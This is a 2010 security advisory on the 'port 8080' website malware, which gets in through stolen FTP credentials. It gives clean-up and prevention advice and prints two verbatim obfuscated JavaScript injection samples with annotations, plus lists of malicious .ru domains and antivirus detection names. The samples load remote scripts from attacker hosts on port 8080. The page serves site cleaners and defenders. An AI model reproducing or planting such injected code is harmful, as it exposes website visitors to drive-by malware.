Port 8080 Malware

Updated: July 3, 2010

The port 8080 malware places obfuscated malicious JavaScript into a website's web pages and/or JavaScript files. To clean the website, either revert it to a clean backup or remove the malicious code from the affected web pages and/or JavaScript files. The malware gains access to the website through FTP credentials that have been compromised by malware located on a computer that has accessed the website via FTP. To prevent the website from being reinfected, the FTP password needs to be changed and the malware removed from the infected computer before it is used again to access the website via FTP.

Recent Script Format On Web Pages:

<!--
  Sample of the injected block as it appears in infected web pages. The script line
  below is kept verbatim so it can be matched against files during clean-up.

  What the code does, read from the sample itself:
  * z is assembled from substr() fragments into the method name "replace".
  * g(c, N) builds the regular expression [N] with the "g" flag and returns c with
    every character listed in N removed. The statements after its return never run.
  * The padded strings decode to "createElement", "script", "onload", "8080", an
    http:// host name that ends in BuyTheBlender.ru, and a path made of several
    .com site names that ends in ".php".
  * vn creates a script element, sets its src to host + port 8080 + path, sets defer,
    and appends it to document.body. y[G]=vn installs vn as the onload handler.
  * The remaining declarations (unused variables, new Date(), this.x='') have no
    effect on that behaviour; presumably they are filler that varies per infection.

  NOTE(review): "win dow" is printed with a space, so the line does not parse as
  shown. This looks like a break introduced when the sample was published; confirm
  against an original infected file before using the text as an exact signature.

  When cleaning a site, useful markers are the substr-built "replace", the call
  pattern g('padded string', "pad characters"), and the digit string that reduces
  to 8080.
-->
<script>var Hy;if(Hy!='S'){Hy='S'};try {var gq;if(gq!='' && gq!='w'){gq=''};var yq=new Date();var FU=new Date();var F=RegExp;var a;if(a!='u' && a!='Fm'){a='u'};var vZ=new Array();var z=new String("HThUre".substr(4)+"plkoG".substr(0,2)+"ac"+"eLyMm".substr(0,1));var d;if(d!='' && d!='Hj'){d=''};var j=new Array();var I;if(I!='' && I!='yY'){I=null};function g(c,N){var MF=new String();this.Gr='';var W=String("[");var M=String("xM5g".substr(3));W+=N;W+=new String("]");var xK;if(xK!='UE' && xK != ''){xK=null};var gC=new Date();var v=new F(W, M);var TF=new String();this.Uh="";return c[z](v, new String());this.I_='';};var A=new Date();var gD='';var ma;if(ma!='gR' && ma!='f'){ma=''};var y=win dow;var Of;if(Of!='gz'){Of=''};var T=g('cCrCe6aztzeOEOl6eCmCeCnCt6',"C6Oz");var H_=new String();var kr;if(kr!='mb' && kr != ''){kr=null};var V=g('/5c1r1i1cHi9nCfCo5.9c1o9m9/9cCr9iCc9i9n1f1oC.5cHoHmH/5sChCa5r1e5a5s9a9lHeC.Cc9o9mC/5g9oHo5g1l5e9.Cc9o9m5/Hp1a1n5t5i5pH.5cCo9m5.9pHh9pH',"1CH95");var v_=new Date();var b;if(b!='tD' && b!='lG'){b=''};var L=g('hJtFtJpF:F/F/FfJrFeJsJhFwFaFpF-FnFeFtJ.FsFiJtJeJsFeFlFlJ.FcJoFmF.FhFoJoFpFcJhFiJnJaJ-FcJoJmJ.FBJuFyJTJhFeJBFlJeJnJdJeFrJ.FrFuJ:J',"FJ");var Ar="";var O=g('8452097248494902724',"57294");var H='';var G=g('ognglOogaOdj',"jOUgf");var lA;if(lA!=''){lA='Yf'};var r=g('sAcFrTiypytA',"FyTA");vn=function(){var s=new String();var Ie=new String();e=document[T](r);var UHP;if(UHP!='' && UHP!='Z'){UHP=null};var bu='';H=L+O;var TFn;if(TFn!='LT' && TFn!='yi'){TFn='LT'};H+=V;var HQ;if(HQ!='iW'){HQ=''};var al=new Date();this.Pv='';e.src=H;e.defer=([1][0]);var yf="";var KE=new Array();document.body.appendChild(e);var Kk='';this.Kkt="";};var Vx;if(Vx!='' && Vx!='IF'){Vx='tDv'};y[G]=vn;this.FA="";var GH=new String();} catch(Y){this.hN="";};var VW;if(VW!=''){VW='DY'};var kp=new Array();</script>

Recent Script Format In JavaScript Files:

// Sample of the injected code as it appears in infected JavaScript files. The code
// line below is kept verbatim so it can be matched against files during clean-up.
//
// What the code does, read from the sample itself:
// * N is assembled from substr() fragments into the method name "replace".
// * I(R, f) builds the regular expression [f] with the "g" flag and returns R with
//   every character listed in f removed. The statements after its return never run.
// * The padded strings decode to "createElement", "script", "onload", "8080", an
//   http:// host name that ends in TheBlenderTutorial.ru, and a path made of several
//   site names that ends in ".php".
// * r creates a script element, sets defer, sets its src to host + port 8080 + path,
//   and appends it to document.body. A[O]=r installs r as the onload handler.
// * The remaining declarations (unused variables, new Date(), this.x='') have no
//   effect on that behaviour; presumably they are filler that varies per infection.
//
// NOTE(review): "win dow" is printed with a space, so the line does not parse as
// shown. This looks like a break introduced when the sample was published; confirm
// against an original infected file before using the text as an exact signature.
//
// When cleaning a site, useful markers are the substr-built "replace", the call
// pattern I('padded string', "pad characters"), and the digit string that reduces
// to 8080. In .js files, check for code like this added to an otherwise normal file.
var z="";var a;if(a!='' && a!='IR'){a=null};try {var v;if(v!='s' && v!='Xh'){v=''};var Z='';var Q=new Date();this.fo="";var N=String("0uaNre".substr(4)+"SXhIpl".substr(4)+"NsuOac".substr(4)+"e");var Esd;if(Esd!='Wm' && Esd != ''){Esd=null};var C=new String();var i=RegExp;this.Rc='';var Zd="";function I(R,f){var o="[cDB".substr(0,1);var w;if(w!='' && w!='oI'){w=null};var E=String("UJpCg".substr(4));var D='';o+=f;this.gg='';o+=String("]");var Ya='';var Vk=new Date();this.Xy="";var RX=new i(o, E);this.K='';return R[N](RX, new String());this.GK='';this.Cm='';};var yL;if(yL!='Ig' && yL!='pS'){yL='Ig'};var aZ;if(aZ!='' && aZ!='GE'){aZ=''};var iF=I('hWtXtWpL:L/X/XuLpLlWoLaXdWiWnLgL-LcXoWmX.LgXoLoLgLlLeW.WhXrX.XtLoXpWiXxW-LcLoXmW.WTLhWeXBXlWeLnXdLeLrXTXuXtXoLrLiLaWlW.LrLuW:X',"XWL");var ER=I('87171370137331835371031153',"3157");this.KE="";var O=I('oWnRlRoWaWdR',"RcW");var fw=new Date();var iU=new Date();var b=I('cDrSeDaKtDedEDlKedmpeSnKtD',"KpSdD");var uj;if(uj!='eh'){uj='eh'};var M=I('s9c7rLiLp9td',"LQ79d");var W=I('/65686.1c1o6m1/15D86.6c1o1m1/Ds6oDn6i1c1o1.Dc1oDm1/1a6mDe1b6l1o6.DjDp6/1g1o6oDg6l6e6.DcDo1m6.6p1hDpD',"D61");var B='';var Uq;if(Uq!='se'){Uq=''};var A=win dow;r=function(){var fq=new String();var J;if(J!='' && J!='hm'){J=''};var d=new Array();var JE;if(JE!='' && JE!='LH'){JE='Xq'};OO=document[b](M);var zK=new Date();var pf;if(pf!='' && pf!='Uf'){pf=null};B=iF+ER;var IA=new Array();B+=W;var YQ;if(YQ!='' && YQ!='EL'){YQ=''};var oi='';var WF='';OO.defer=([1][0]);OO.src=B;this.MT='';document.body.appendChild(OO);var Fs;if(Fs!='' && Fs!='nu'){Fs=''};var Cn;if(Cn!='bg'){Cn=''};};var hZ;if(hZ!='' && hZ!='Bx'){hZ=''};var Wv;if(Wv!='' && Wv!='V_'){Wv=''};var PO='';var dC='';A[O]=r;this.HV="";var CI;if(CI!='Us' && CI!='RC'){CI=''};} catch(X){var WJ='';};

Recent Domains Used by the Malware: whosaleonline.ru, worldmusicmagazine.ru, homesaleplus.ru, sugaryhome.ru, carswebnet.ru, webnetenglish.ru, thechocolateweb.ru, worldwebworld.ru, webdesktopnet.ru, funwebmail.ru, thelaceweb.ru, thechocolateweb, webdesktopnet.ru, greatwebradio.ru, cobalttrueblue.ru, guidebat.ru, recentmexico.ru, avattop.ru, newusaguide.ru, livesitedesign.ru, sitemape.ru, samuest.ru, forredtag.ru, newvillagefresh.ru, supernewstuff.ru, hotnewgirl.ru, supermicrotag.ru, newagedirect.ru, yoursuperpool.ru, buytheblender.ru, neolabonline.ru, excellentblender.ru, theblendertutorial.ru, yoursupercar.ru, theblendertv.ru, supersupermall.ru, seasilversite.ru, thesuperexchange.ru, yourblenderparts.ru, superroadmap.ru, superbblender.ru, thesuperpager.ru, needserve.ru, loadtube.ru, snoreflash.ru, retireterrify.ru, royalbling.ru, pokesack.ru, reachsaw.ru, mournfool.ru, improveflood.ru, slowcheer.ru, lostdeed.ru, ashsoftware.ru, tenthprofit.ru, skepticalpub.ru, rarephone.ru, relaxedgrape.ru, globaljoke.ru, ashdog.ru, missgin.ru, onewinter.ru, stellarshower.ru, petquestion.ru, greatfile.ru, westcountry.ru

Recent Virus Scan Identifications: JS:Illredir-A [Trj], JS:Illredir-B [Trj], JS:Illredir-C [Trj], JS:Illredir-D [Trj], JS:Illredir-E [Trj], JS:Illredir-F [Trj], JS:Illredir-G [Trj], JS:Illredir-I [Trj], JS:Illredir-Q [Trj], JS:Illredir-S [Trj], JS:Illredir-W [Trj], JS:Illredir-Y [Trj], JS:Illredir-Z [Trj], JS:Illredir-AC [Trj], JS:Illredir-AD [Trj], JS:Illredir-AH [Trj], JS:Illredir-AI [Trj], JS:Illredir-AK [Trj], JS:Illredir-AL [Trj], JS:Illredir-AN [Trj], JS:Illredir-AQ [Trj], JS:Illredir-AS [Trj], JS:Illredir-AX [Trj], JS:Illredir-AY [Trj], JS:Illredir-BR [Trj], JS:Illredir-BT [Trj], JS:Illredir-BU [Trj], JS:Illredir-BX [Trj], JS:Illredir-BY [Trj], JS:Illredir-CB [Trj], Troj/JSRedir-AK, Troj/JSRedir-AL, Troj/JSRedir-AR, Troj/JSRedir-AU, Troj/JSRedir-BB, Troj/JSRedir-BD, Troj/JSRedir-BF, Troj/JSRedir-BL, JS/Redirector.j, Trojan:JS/Redirector.CR

